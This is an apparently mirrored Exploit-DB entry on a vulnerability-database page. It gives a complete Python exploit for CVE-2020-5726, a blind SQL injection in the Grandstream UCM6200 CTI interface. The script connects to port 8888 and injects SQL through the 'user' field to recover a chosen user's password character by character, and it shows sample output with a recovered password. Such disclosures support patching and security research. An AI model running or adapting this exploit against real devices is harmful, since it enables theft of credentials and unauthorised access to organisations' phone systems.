Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Grandstream UCM6200 Series CTI Interface - 'user_password' SQL Injection

🗓️ 31 Mar 2020 00:00:00Reported by Jacob BainesType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 217 Views

Grandstream UCM6200 Series CTI Interface - 'user_password' SQL Injection, CVE-2020-572

Related
Code
ReporterTitlePublishedViews
Family
0day.today		Grandstream UCM6200 Series CTI Interface - (user_password) SQL Injection Exploit
31 Mar 202000:00
zdt
Circl		CVE-2020-5726
18 Oct 202416:52
circl
CNVD		Grandstream UCM6200 SQL Injection Vulnerability (CNVD-2020-24401)
31 Mar 202000:00
cnvd
CVE		CVE-2020-5726
30 Mar 202019:03
cve
Cvelist		CVE-2020-5726
30 Mar 202019:03
cvelist
EUVD		EUVD-2020-26885
7 Oct 202500:30
euvd
exploitpack		Grandstream UCM6200 Series CTI Interface - user_password SQL Injection
31 Mar 202000:00
exploitpack
NVD		CVE-2020-5726
30 Mar 202020:15
nvd
Packet Storm		Grandstream UCM6200 Series CTI Interface SQL Injection
31 Mar 202000:00
packetstorm
Prion		Sql injection
30 Mar 202020:15
prion
Rows per page
# Exploit Title: Grandstream UCM6200 Series CTI Interface - 'user_password' SQL Injection
# Date: 2020-03-30
# Exploit Author: Jacob Baines
# Vendor Homepage: http://www.grandstream.com/
# Software Link: http://www.grandstream.com/support/firmware/ucm62xx-official-firmware
# Version: 1.0.20.20 and below
# Tested on: Grandstream UCM6202 1.0.20.20
# CVE : CVE-2020-5726
# Grandstream UCM6200 Series CTI Interface SQL Injection Password Disclosure
# Advisory: https://www.tenable.com/security/research/tra-2020-17
# Sample output:
#
# albinolobster@ubuntu:~$ python3 cti_injection.py --rhost 192.168.2.1
--user lolwat
# [+] Reaching out to 192.168.2.1:8888
# [+] Password length 9
# [+] The password is LabPass1%

import sys
import time
import json
import struct
import socket
import argparse

def send_cti_with_length(sock, payload):
    to_send = struct.pack('>I', len(payload))
    to_send = to_send + payload
    sock.sendall(to_send)

    return recv_cti_with_length(sock)

def recv_cti_with_length(sock):
    length = sock.recv(4)
    length = struct.unpack('>I', length)[0]
    response = sock.recv(length)
    return response

top_parser = argparse.ArgumentParser(description='')
top_parser.add_argument('--rhost', action="store", dest="rhost",
required=True, help="The remote host to connect to")
top_parser.add_argument('--rport', action="store", dest="rport", type=int,
help="The remote port to connect to", default=8888)
top_parser.add_argument('--user', action="store", dest="user",
required=True, help="The user to brute force")
args = top_parser.parse_args()


print('[+] Reaching out to ' + args.rhost + ':' + str(args.rport))

length = 0
while length < 100:

    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.connect((args.rhost, args.rport))

    challenge_resp = send_cti_with_length(sock, b"action=challenge&user=" +
args.user.encode('utf-8') + b"' AND LENGTH(user_password)=" +
str(length).encode('utf-8') + b"--")
    inject_result = json.loads(challenge_resp)

    if (inject_result['status'] == 0):
        break
    else:
        length = length + 1

    sock.close()

if length == 100:
    print('[-] Failed to discover the password length')
    sys.exit(1)

print('[+] Password length', length)

password = ''
while len(password) < length:
    value = 0x20
    while value < 0x80:

        if value == 0x22 or value == 0x5c:
            temp_pass = password + '\\'
            temp_pass = temp_pass + chr(value)
        else:
            temp_pass = password + chr(value)

        temp_pass_len = len(temp_pass)

        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.connect((args.rhost, args.rport))

        challenge_resp = send_cti_with_length(sock,
b"action=challenge&user=" + args.user.encode('utf-8') + b"' AND
user_password LIKE \'" + temp_pass.encode('utf-8') + b"%' AND
substr(user_password,1," + str(temp_pass_len).encode('utf-8') + b") = '" +
temp_pass.encode('utf-8') + b"'--")
        inject_result = json.loads(challenge_resp)

        sock.close()

        if (inject_result['status'] == 0):
            password = temp_pass
            break
        else:
            value = value + 1
            continue

    if value == 0x80:
        print('oh no.')
        sys.exit(0)

print('[+] The password is', password)

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
31 Mar 2020 00:00Current
7.6High risk
Vulners AI Score7.6
CVSS 25
CVSS 3.17.5
EPSS0.06357
grandstream ucm6200cti interfacesql injectionpassword disclosurecve-2020-5726
217